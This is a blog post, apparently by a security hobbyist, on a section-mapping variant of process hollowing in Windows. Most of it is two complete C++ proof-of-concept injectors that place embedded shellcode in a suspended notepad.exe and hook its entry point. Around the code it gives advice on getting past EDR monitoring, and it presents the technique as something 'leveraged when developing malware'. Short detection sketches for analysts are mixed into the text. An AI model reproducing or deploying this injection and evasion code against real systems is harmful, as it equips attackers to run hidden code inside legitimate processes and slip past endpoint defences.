Process Hollowing? not really

Introduction⌗
Process hollowing is a code injection and evasion technique that is often used in malware.
It works by hollowing out a legitimate process image and replacing it with malicious code.
Malware that uses process hollowing starts a target process with the CREATE_SUSPENDED flag set. Then, using the handle it received when the process was created, it hollows out (unmaps) the legitimate executable image from the target process's memory.
The problem⌗
However, malware tends to use the same set of APIs for this task. Some of these APIs are:
- CreateProcessA
- WriteProcessMemory
- VirtualProtect
- VirtualAlloc
It is well known that these APIs are often monitored by defense solutions.
The other major disadvantage is that, when the above APIs are used for code injection, the malware leaves a lot of memory artifacts, which makes it easy for forensic analysts to identify the parasite.
For example, to inject code in a Windows environment, one must first allocate enough memory in the target process for the parasite. This alone is not enough, because the allocated memory regions need executable (X) permission. Those regions must also be writable, because otherwise WriteProcessMemory, or any other API that writes to another process's memory, simply won't work. Therefore, a memory region that is both executable and writable is a strong indication of an infection.
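Seen from the analyst's side, spotting this artifact comes down to a check on a region's protection value. Here is a minimal sketch, assuming the value comes from something like the Protect field that VirtualQueryEx reports for a region. The function name is made up for illustration, and the constants are copied from winnt.h so the snippet compiles without the Windows headers.

```cpp
#include <cstdint>

// Protection constants as defined in winnt.h, repeated here so the
// sketch builds on any platform.
constexpr std::uint32_t kPageExecuteReadWrite = 0x40; // PAGE_EXECUTE_READWRITE
constexpr std::uint32_t kPageExecuteWriteCopy = 0x80; // PAGE_EXECUTE_WRITECOPY

// Hypothetical helper: returns true when a region's protection value
// allows both writing and execution. Modifier bits such as PAGE_GUARD
// (0x100) or PAGE_NOCACHE (0x200) sit above the low byte, so they are
// masked off before comparing.
bool isWritableAndExecutable(std::uint32_t protect)
{
    const std::uint32_t base = protect & 0xFF;
    return base == kPageExecuteReadWrite || base == kPageExecuteWriteCopy;
}
```

A scanner would call this for every region of a process and report the hits, for example `isWritableAndExecutable(mbi.Protect)` where `mbi` is an assumed MEMORY_BASIC_INFORMATION filled in by the caller.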
The solution⌗
Well, there are solutions to the first problem. For example, one can invoke syscalls directly without going through kernel32.dll.
Of course, that's a good solution, but it won't solve the second issue.
Basics⌗
Userland defense solutions mostly operate by hooking common API calls and monitoring them for malicious content. These common APIs include the ones that malware often uses for various injection techniques. To name a few:
- OpenProcess / CreateProcess
- VirtualAlloc
- VirtualProtect
- WriteProcessMemory
In the past, malware authors extensively used VirtualAlloc to inject malicious code into a target process. They achieved this by allocating a memory chunk with RWX permissions, which in fact became a well-known indication of code injection (a memory artifact).
As a solution to this, malware authors used a combination of VirtualAlloc and VirtualProtect to inject code into a remote process. First, the malware allocates a memory chunk in the remote process with RW permissions using VirtualAlloc, then it changes the permissions to RX using VirtualProtect.
Although this seems like a victory (since it gets rid of RWX sections), defense solutions began hooking these two calls.
Then malware authors came up with another technique, which uses two APIs from NTAPI. (Well, defense solutions then hooked ntdll as well, but that's out of scope for this blog post.)
To understand the technique, one must understand how the following NTAPI functions work.
- NtCreateSection
- NtMapViewOfSection
- ZwUnmapViewOfSection
- NtSetContextThread
For that purpose, we are going to write a small shellcode injector using some of the above functions.
#include <iostream>
#include <Windows.h>
#include <winternl.h>
#pragma comment(lib, "ntdll")
unsigned char buf[] =
"\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9\x64\x8b"
"\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08\x8b\x7e\x20\x8b"
"\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff\xe1\x60\x8b\x6c\x24"
"\x24\x8b\x45\x3c\x8b\x54\x28\x78\x01\xea\x8b\x4a\x18\x8b\x5a"
"\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0"
"\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c"
"\x24\x28\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a"
"\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc3\xb2"
"\x08\x29\xd4\x89\xe5\x89\xc2\x68\x8e\x4e\x0e\xec\x52\xe8\x9f"
"\xff\xff\xff\x89\x45\x04\xbb\x7e\xd8\xe2\x73\x87\x1c\x24\x52"
"\xe8\x8e\xff\xff\xff\x89\x45\x08\x68\x6c\x6c\x20\x41\x68\x33"
"\x32\x2e\x64\x68\x75\x73\x65\x72\x30\xdb\x88\x5c\x24\x0a\x89"
"\xe6\x56\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c"
"\x24\x52\xe8\x5f\xff\xff\xff\x68\x6f\x78\x58\x20\x68\x61\x67"
"\x65\x42\x68\x4d\x65\x73\x73\x31\xdb\x88\x5c\x24\x0a\x89\xe3"
"\x68\x6b\x74\x58\x20\x68\x74\x20\x72\x65\x68\x45\x3d\x67\x65"
"\x68\x54\x49\x54\x4c\x68\x72\x65\x6b\x74\x68\x67\x65\x74\x20"
"\x31\xc9\x88\x4c\x24\x16\x89\xe1\x31\xd2\x52\x53\x51\x52\xff"
"\xd0\x31\xc0\x50\xff\x55\x08";
int main(int argc, char *argv[])
{
if (argc == 2)
{
LARGE_INTEGER sectionSize = { sizeof buf };
HANDLE sectionHandle = NULL;
PVOID localSectionAddress = NULL, remoteSectionAddress = NULL;
// create a read write execute memory region in the local process
if (fNtCreateSection(
&sectionHandle,
SECTION_ALL_ACCESS,
NULL,
(PLARGE_INTEGER)&sectionSize,
PAGE_EXECUTE_READWRITE,
SEC_COMMIT, NULL) != STATUS_SUCCESS)
{
std::cout << "[x]Create section failed\n";
return 0;
}
SIZE_T size = sizeof buf;
// create a view of the memory section in the local process
if (fNtMapViewOfSection(
sectionHandle,
GetCurrentProcess(),
&localSectionAddress,
NULL, NULL, NULL,
&size, 2, NULL,
PAGE_READWRITE) != STATUS_SUCCESS)
{
std::cout << "[x]Create map failed\n";
return 0;
}
HANDLE processHandle = OpenProcess(
PROCESS_ALL_ACCESS,
FALSE,
DWORD(atoi(argv[1])));
if (processHandle == NULL)
{
std::cout << "[x] Open process failed\n";
return 0;
}
// create a map view of the section in the target process
if (fNtMapViewOfSection(
sectionHandle,
processHandle,
&remoteSectionAddress,
NULL, NULL, NULL,
&size, 2, NULL,
PAGE_EXECUTE_READ) != STATUS_SUCCESS)
{
std::cout << "[x]Create map failed\n";
return 0;
}
std::cout << "remote section created" << std::endl;
memcpy(localSectionAddress, buf, sizeof(buf));
std::cout << "Shellcode injected at 0x" << std::hex << remoteSectionAddress << std::endl;
CloseHandle(sectionHandle);
HANDLE targetThreadHandle = NULL;
fRtlCreateUserThread(
processHandle,
NULL,
FALSE, 0, 0, 0,
remoteSectionAddress,
NULL,
&targetThreadHandle, NULL
);
}
else
{
std::cout << "./whatever.exe <pid>" << std::endl;
}
}
The NtCreateSection function creates a shared section of memory that two or more processes can read from and write to. The function expects the address of an uninitialized section handle. This section handle is initialized by the function and is used whenever that specific section is referenced afterwards.
NtMapViewOfSection is the function that consumes the initialized section handle returned through the output parameter of NtCreateSection. It maps a view of the section referenced by that handle into the process the caller specifies.
In the above snippet, NtCreateSection is used to create a section of size sizeof buf with PAGE_EXECUTE_READWRITE permissions. Then two calls to NtMapViewOfSection map the section into the local process and the remote process. The local view is mapped as PAGE_READWRITE, while the remote view is mapped as PAGE_EXECUTE_READ.
This clearly shows the advantage of NtCreateSection + NtMapViewOfSection over many other process injection techniques. Since the memory appears in the target process with PAGE_EXECUTE_READ permissions, calls to VirtualAlloc won't be required. This also helps against some EDR solutions ([...] shellcode started crashing).
Here's the result.
[Screenshot: mapped section in the remote process]
Now that the APIs are understood, it is time to demonstrate the process hollowing technique using the above code injection technique.
Implementation⌗
Before implementing it, it is essential to understand what can be done and what we are going to do with the above injection technique.
Since this post is about process hollowing, anyone would guess that we are going to hollow out the target process image and inject shellcode in its place using the above technique. Simply put, no.
The steps can be briefly described as follows.
- Inject the shellcode into the target process
- Retrieve the ImageBaseAddress of the executable image
- Read the executable image of the remote process into a buffer
- Unmap the executable image from the process
- Hook a location in the copied image so that it jumps to the shellcode
- Remap the patched copy into the remote process as a section, using the above technique
Here is the PoC code.
#include <iostream>
#include <Windows.h>
#include <winternl.h>
#pragma comment(lib, "ntdll")
#define SECTION_SIZE 0x1000
typedef struct {
HRSRC shellcodeResource;
SIZE_T shellcodeSize;
BYTE* shellcode;
} SHELLCODE;
typedef struct {
HANDLE processHandle;
DWORD imageBaseAddress;
DWORD entryPoint;
} HOST;
#if !defined NTSTATUS
typedef LONG NTSTATUS;
#endif
#define STATUS_SUCCESS 0
typedef CLIENT_ID* PCLIENT_ID;
using myNtCreateSection = NTSTATUS(NTAPI*)(
OUT PHANDLE SectionHandle,
IN ULONG DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN PLARGE_INTEGER MaximumSize OPTIONAL,
IN ULONG PageAttributess,
IN ULONG SectionAttributes,
IN HANDLE FileHandle OPTIONAL
);
using myNtMapViewOfSection = NTSTATUS(NTAPI*)(
HANDLE SectionHandle,
HANDLE ProcessHandle,
PVOID* BaseAddress,
ULONG_PTR ZeroBits,
SIZE_T CommitSize,
PLARGE_INTEGER SectionOffset,
PSIZE_T ViewSize,
DWORD InheritDisposition,
ULONG AllocationType,
ULONG Win32Protect
);
using myZwUnmapViewOfSection = NTSTATUS(NTAPI*)(
IN HANDLE ProcessHandle,
IN PVOID BaseAddress
);
using myNtGetContextThread = NTSTATUS(NTAPI*) (
IN HANDLE ThreadHandle,
OUT PCONTEXT Context
);
using myNtSetContextThread = NTSTATUS(NTAPI*) (
IN HANDLE ThreadHandle,
IN PCONTEXT Context
);
myNtCreateSection fNtCreateSection = (myNtCreateSection)(GetProcAddress(
GetModuleHandleA("ntdll"),
"NtCreateSection"));
myNtMapViewOfSection fNtMapViewOfSection = (myNtMapViewOfSection)(GetProcAddress(
GetModuleHandleA("ntdll"),
"NtMapViewOfSection"));
myZwUnmapViewOfSection fZwUnmapViewOfSection = (myZwUnmapViewOfSection)(GetProcAddress(
GetModuleHandleA("ntdll"),
"ZwUnmapViewOfSection"));
myNtGetContextThread fNtGetContextThread = (myNtGetContextThread)(GetProcAddress(
GetModuleHandleA("ntdll"),
"NtGetContextThread"));
myNtSetContextThread fNtSetContextThread = (myNtSetContextThread)(GetProcAddress(
GetModuleHandleA("ntdll"),
"NtSetContextThread"));
DWORD GetSizeOfImage(BYTE* processImage)
{
IMAGE_DOS_HEADER* dosHeader = NULL;
IMAGE_NT_HEADERS* ntHeaders = NULL;
dosHeader = (IMAGE_DOS_HEADER*)processImage;
ntHeaders = (IMAGE_NT_HEADERS*)((BYTE*)processImage + dosHeader->e_lfanew);
return ntHeaders->OptionalHeader.SizeOfImage;
}
DWORD GetEntryPoint(BYTE* processImage)
{
IMAGE_DOS_HEADER* dosHeader = NULL;
IMAGE_NT_HEADERS* ntHeaders = NULL;
dosHeader = (IMAGE_DOS_HEADER*)processImage;
ntHeaders = (IMAGE_NT_HEADERS*)((BYTE*)processImage + dosHeader->e_lfanew);
return (ntHeaders->OptionalHeader.AddressOfEntryPoint);
}
PVOID PatchHostProcess(HOST* hostProcess, PVOID shellcodeAddress)
{
// read enough bytes to get the size of image
SIZE_T bytesRead = 0;
BYTE* imageData = new(BYTE[SECTION_SIZE]);
// both calls read the same chunk of same size because this readprocessmemory fails we change the size
if (!ReadProcessMemory(
hostProcess->processHandle,
(LPCVOID)hostProcess->imageBaseAddress,
imageData,
SECTION_SIZE,
&bytesRead) && bytesRead != SECTION_SIZE)
{
std::cout << "[!] failed to read process image headers" << std::endl;
return NULL;
}
DWORD sizeOfImage = GetSizeOfImage(imageData);
delete[] imageData;
BYTE* processImage = new(BYTE[sizeOfImage]);
if (!ReadProcessMemory(
hostProcess->processHandle,
(LPCVOID)hostProcess->imageBaseAddress,
processImage,
sizeOfImage,
&bytesRead) && bytesRead != sizeOfImage)
{
std::cout << "[!] failed to read process image" << std::endl;
return NULL;
}
DWORD entryPoint = GetEntryPoint(processImage);
std::cout << "[!]Original entry point : 0x" << std::hex << hostProcess->imageBaseAddress + entryPoint << std::endl;
memset(processImage + entryPoint, 0x90, 5);
DWORD processEntry = hostProcess->imageBaseAddress + entryPoint;
DWORD relativeAddr = (((DWORD)shellcodeAddress - processEntry) - 5);
*((BYTE*)processImage + entryPoint) = 0xe9; // jmp
*(uintptr_t*)((uintptr_t)processImage + entryPoint + 1) = relativeAddr; // address
LARGE_INTEGER sectionSize = { sizeOfImage };
HANDLE sectionHandle = NULL;
PVOID sectionAddress = NULL;
if (fNtCreateSection(
&sectionHandle,
SECTION_ALL_ACCESS,
NULL,
(PLARGE_INTEGER)&sectionSize,
PAGE_EXECUTE_READWRITE,
SEC_COMMIT, NULL) != STATUS_SUCCESS)
{
std::cout << "[!] create section failed" << std::endl;
return NULL;
}
if (fNtMapViewOfSection(
sectionHandle,
GetCurrentProcess(),
&sectionAddress,
NULL, NULL, NULL,
&bytesRead, 2, NULL,
PAGE_EXECUTE_READWRITE) != STATUS_SUCCESS)
{
std::cout << "[!] create section failed" << std::endl;
return NULL;
}
std::cout << "[!]replacing patched process image at 0x" << std::hex << hostProcess->imageBaseAddress << std::endl;
memcpy(sectionAddress, processImage, sizeOfImage);
sectionAddress = (PVOID)hostProcess->imageBaseAddress;
if (fZwUnmapViewOfSection(
hostProcess->processHandle,
sectionAddress) != STATUS_SUCCESS)
{
std::cout << "[!] unmapping failed" << std::endl;
return NULL;
}
if (fNtMapViewOfSection(
sectionHandle,
hostProcess->processHandle,
&sectionAddress,
NULL, NULL, NULL,
&bytesRead,
2, NULL,
PAGE_EXECUTE_READWRITE) != STATUS_SUCCESS)
{
std::cout << "create section failed" << std::endl;
return NULL;
}
CloseHandle(sectionHandle);
delete[] processImage;
return (PVOID)processEntry;
}
PVOID InjectShellcode(HOST* hostProcess, SHELLCODE* s)
{
LARGE_INTEGER sectionSize = { s->shellcodeSize };
HANDLE sectionHandle = NULL;
PVOID localSectionAddress = NULL, remoteSectionAddress = NULL;
// create a read write execute memory region in the local process
if (fNtCreateSection(
&sectionHandle,
SECTION_MAP_READ | SECTION_MAP_WRITE | SECTION_MAP_EXECUTE,
NULL,
(PLARGE_INTEGER)&sectionSize,
PAGE_EXECUTE_READWRITE,
SEC_COMMIT,
NULL) != STATUS_SUCCESS)
{
std::cout << "[x]Create section failed\n";
return NULL;
}
// create a view of the memory section in the local process
if (fNtMapViewOfSection(
sectionHandle,
GetCurrentProcess(),
&localSectionAddress,
NULL, NULL, NULL,
&s->shellcodeSize,
2, NULL,
PAGE_READWRITE) != STATUS_SUCCESS)
{
std::cout << "[x]Create map failed\n";
return NULL;
}
// create a map view of the section in the target process
if (fNtMapViewOfSection(
sectionHandle,
hostProcess->processHandle,
&remoteSectionAddress,
NULL, NULL, NULL,
&s->shellcodeSize,
2, NULL,
PAGE_EXECUTE_READ) != STATUS_SUCCESS)
{
std::cout << "[x]Create map failed\n";
return NULL;
}
memcpy(localSectionAddress, s->shellcode, s->shellcodeSize);
std::cout << "[!]Shellcode injected to 0x" << std::hex << (DWORD)remoteSectionAddress << std::endl;
CloseHandle(sectionHandle);
return remoteSectionAddress;
}
int main(void)
{
unsigned char buf[] =
"\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9\x64\x8b"
"\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08\x8b\x7e\x20\x8b"
"\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff\xe1\x60\x8b\x6c\x24"
"\x24\x8b\x45\x3c\x8b\x54\x28\x78\x01\xea\x8b\x4a\x18\x8b\x5a"
"\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0"
"\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c"
"\x24\x28\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a"
"\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc3\xb2"
"\x08\x29\xd4\x89\xe5\x89\xc2\x68\x8e\x4e\x0e\xec\x52\xe8\x9f"
"\xff\xff\xff\x89\x45\x04\xbb\x7e\xd8\xe2\x73\x87\x1c\x24\x52"
"\xe8\x8e\xff\xff\xff\x89\x45\x08\x68\x6c\x6c\x20\x41\x68\x33"
"\x32\x2e\x64\x68\x75\x73\x65\x72\x30\xdb\x88\x5c\x24\x0a\x89"
"\xe6\x56\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c"
"\x24\x52\xe8\x5f\xff\xff\xff\x68\x6f\x78\x58\x20\x68\x61\x67"
"\x65\x42\x68\x4d\x65\x73\x73\x31\xdb\x88\x5c\x24\x0a\x89\xe3"
"\x68\x6b\x74\x58\x20\x68\x74\x20\x72\x65\x68\x45\x3d\x67\x65"
"\x68\x54\x49\x54\x4c\x68\x72\x65\x6b\x74\x68\x67\x65\x74\x20"
"\x31\xc9\x88\x4c\x24\x16\x89\xe1\x31\xd2\x52\x53\x51\x52\xff"
"\xd0\x31\xc0\x50\xff\x55\x08";
HOST* hostProcess = new HOST();
LPSTARTUPINFOA si = new STARTUPINFOA();
LPPROCESS_INFORMATION pi = new PROCESS_INFORMATION();
PROCESS_BASIC_INFORMATION* pbi = new PROCESS_BASIC_INFORMATION();
DWORD returnLength = 0;
CONTEXT ctx;
SHELLCODE* s = new SHELLCODE();
s->shellcode = buf;
s->shellcodeSize = sizeof(buf);
if (CreateProcessA(
"C:\\Windows\\System32\\notepad.exe",
(LPSTR)"C:\\Windows\\System32\\notepad.exe",
NULL, NULL, TRUE,
CREATE_SUSPENDED | CREATE_NO_WINDOW,
NULL, NULL, si, pi) == FALSE)
{
std::cout << "[x]Failed to execute notepad.exe\n";
return FALSE;
}
std::cout << "[!]Executed notepad.exe\n";
hostProcess->processHandle = pi->hProcess;
ctx.ContextFlags = CONTEXT_FULL;
fNtGetContextThread(pi->hThread, &ctx);
NtQueryInformationProcess(
hostProcess->processHandle,
ProcessBasicInformation,
pbi,
sizeof(PROCESS_BASIC_INFORMATION),
&returnLength);
DWORD pebImageBaseOffset = (DWORD)pbi->PebBaseAddress + 0x8;
SIZE_T bytesRead = 0;
if (!ReadProcessMemory(
hostProcess->processHandle,
(LPCVOID)pebImageBaseOffset,
&hostProcess->imageBaseAddress,
4, &bytesRead) && bytesRead != 4)
{
std::cout << "failed to read image base address" << std::endl;
return -1;
}
PVOID remoteShellcodeAddress = InjectShellcode(hostProcess, s);
if (remoteShellcodeAddress == NULL)
{
std::cout << "shellcode injection failed\n";
return -1;
}
PVOID addr = NULL;
if ((addr = PatchHostProcess(hostProcess, remoteShellcodeAddress)) == NULL)
{
std::cout << "failed to patch host\n";
return -1;
}
fNtSetContextThread(pi->hThread, &ctx);
std::cout << "[!] Resumed thread\n";
ResumeThread(pi->hThread);
}
The above code does exactly what is listed above. First, it starts a notepad process with its execution suspended. Then it retrieves the thread context of the process's main thread. The thread context is important because resuming without setting the context back to what it was at suspension will crash the program.
Then it proceeds to retrieve the ImageBaseAddress of the process using NtQueryInformationProcess and ReadProcessMemory. It reads the field at offset 0x8 of the PEB, which is where the image base lives in a 32-bit process.
Then the shellcode is injected into the target process by the function InjectShellcode. This function uses the same technique discussed earlier.
The main function then calls PatchHostProcess. This function reads the host process's image into local memory and parses the entry point. Then, in the local copy, it creates a hook that jumps to the shellcode that InjectShellcode injected. It then uses the above injection method and creates a section in the local process. However, before mapping the section into the remote process, it unmaps the original process image with a call to ZwUnmapViewOfSection. It then maps the section at the same address where the original image was mapped.
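The header parsing step is ordinary PE parsing, and it is the same thing an analyst does when inspecting a dumped image. The sketch below is a hedged, portable take on it: it reads the entry point RVA and SizeOfImage from a raw buffer using the documented PE offsets instead of the Windows structs, and it adds signature and bounds checks that the PoC skips. The names PeInfo, readU32 and parsePeHeaders are made up for this example.

```cpp
#include <cstddef>
#include <cstdint>
#include <optional>
#include <vector>

// Hypothetical result type for this sketch.
struct PeInfo {
    std::uint32_t entryPointRva; // OptionalHeader.AddressOfEntryPoint
    std::uint32_t sizeOfImage;   // OptionalHeader.SizeOfImage
};

// Reads a little-endian 32-bit value at `offset`, or nothing if it
// would run past the end of the buffer.
static std::optional<std::uint32_t> readU32(const std::vector<std::uint8_t>& buf,
                                            std::size_t offset)
{
    if (offset > buf.size() || buf.size() - offset < 4) return std::nullopt;
    return std::uint32_t(buf[offset]) |
           std::uint32_t(buf[offset + 1]) << 8 |
           std::uint32_t(buf[offset + 2]) << 16 |
           std::uint32_t(buf[offset + 3]) << 24;
}

std::optional<PeInfo> parsePeHeaders(const std::vector<std::uint8_t>& image)
{
    // DOS header: "MZ" magic, e_lfanew stored at offset 0x3C.
    if (image.size() < 0x40 || image[0] != 'M' || image[1] != 'Z') return std::nullopt;
    const auto lfanew = readU32(image, 0x3C);
    if (!lfanew) return std::nullopt;

    // NT headers start with the "PE\0\0" signature.
    const std::size_t nt = *lfanew;
    const auto signature = readU32(image, nt);
    if (!signature || *signature != 0x00004550) return std::nullopt;

    // The optional header follows the 4-byte signature and the 20-byte
    // file header. AddressOfEntryPoint is at +16 and SizeOfImage at +56
    // in both the PE32 and PE32+ layouts.
    const std::size_t optionalHeader = nt + 4 + 20;
    const auto entry = readU32(image, optionalHeader + 16);
    const auto size = readU32(image, optionalHeader + 56);
    if (!entry || !size) return std::nullopt;

    return PeInfo{*entry, *size};
}
```

Returning an empty optional on a bad signature or a short buffer keeps a truncated or corrupted read from being treated as a valid image.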
It's worth noting that it is possible to hook any address in the process image, as long as the hook is reached before notepad (or whatever the host is) actually starts up.
Result after compiling and running the code:
[Screenshot: permissions of the shellcode]
[Screenshot: permissions of the original notepad image]
Achieving more stealth⌗
Even though the technique is capable of fooling both analysts and some EDRs, it can still be detected if defense solutions are monitoring CreateProcessA.
There are several workarounds for this. One can directly call NtCreateUserProcess or NtCreateProcessEx.
Another method is to hook one of those APIs and call CreateProcessA with false arguments. For example,
- Hook `NtCreateUserProcess` so it jumps to a specified location
- Call CreateProcessA without the `CREATE_SUSPENDED` flag
- Set the `CREATE_SUSPENDED` flag and jump back to `NtCreateUserProcess`
(To learn more about the above technique, my suggestion is to reverse IcedID.)
The other thing to consider is changing the memory permissions of the target process after remapping. Even without doing that, the RWX permissions can mislead an analyst into believing that the remapped image is the malicious binary.
Even then, once the analyst has dumped the original executable image to analyze it, thinking it is malicious, it is pretty easy to identify the hook. As stated earlier, it is possible to hook any other location as long as it does not start the original process.
It is also possible to use other instructions to change the control flow, for example push / ret.
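To make the "easy to identify" point concrete, here is a small analyst-side sketch that recognizes both redirect forms mentioned in this post at a 32-bit entry point and recovers where they lead. It assumes the caller already has the first bytes of the entry point and its virtual address. decodeRedirect and leavesImage are hypothetical names, and only the two encodings named here (`jmp rel32` as E9, `push imm32; ret` as 68 ... C3) are handled.

```cpp
#include <cstddef>
#include <cstdint>
#include <optional>

// Returns the destination if the bytes at `address` form `jmp rel32`
// or `push imm32; ret`; otherwise returns nothing.
std::optional<std::uint32_t> decodeRedirect(const std::uint8_t* code,
                                            std::size_t length,
                                            std::uint32_t address)
{
    // Little-endian 32-bit immediate starting at index `at`.
    auto imm32 = [code](std::size_t at) -> std::uint32_t {
        return std::uint32_t(code[at]) |
               std::uint32_t(code[at + 1]) << 8 |
               std::uint32_t(code[at + 2]) << 16 |
               std::uint32_t(code[at + 3]) << 24;
    };

    if (length >= 5 && code[0] == 0xE9) {
        // rel32 is relative to the end of the 5-byte instruction; the
        // unsigned addition wraps modulo 2^32, which also covers
        // backward jumps.
        return std::uint32_t(address + 5u + imm32(1));
    }
    if (length >= 6 && code[0] == 0x68 && code[5] == 0xC3) {
        // push imm32 ; ret transfers control to the pushed absolute address.
        return imm32(1);
    }
    return std::nullopt;
}

// True when `target` lies outside [imageBase, imageBase + sizeOfImage).
// The unsigned subtraction also handles target < imageBase.
bool leavesImage(std::uint32_t target, std::uint32_t imageBase,
                 std::uint32_t sizeOfImage)
{
    return std::uint32_t(target - imageBase) >= sizeOfImage;
}
```

An entry point whose first instruction jumps outside the image's own address range is a reasonable thing to flag for a closer look, though legitimate packers and hot patches can produce similar patterns.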
References⌗
Detecting Deceptive Process Hollowing Techniques Using HollowFind Volatility Plugin
The end⌗
This blog post explored the concept of section mapping and how it can be leveraged when developing malware.
#Spread Anarchy!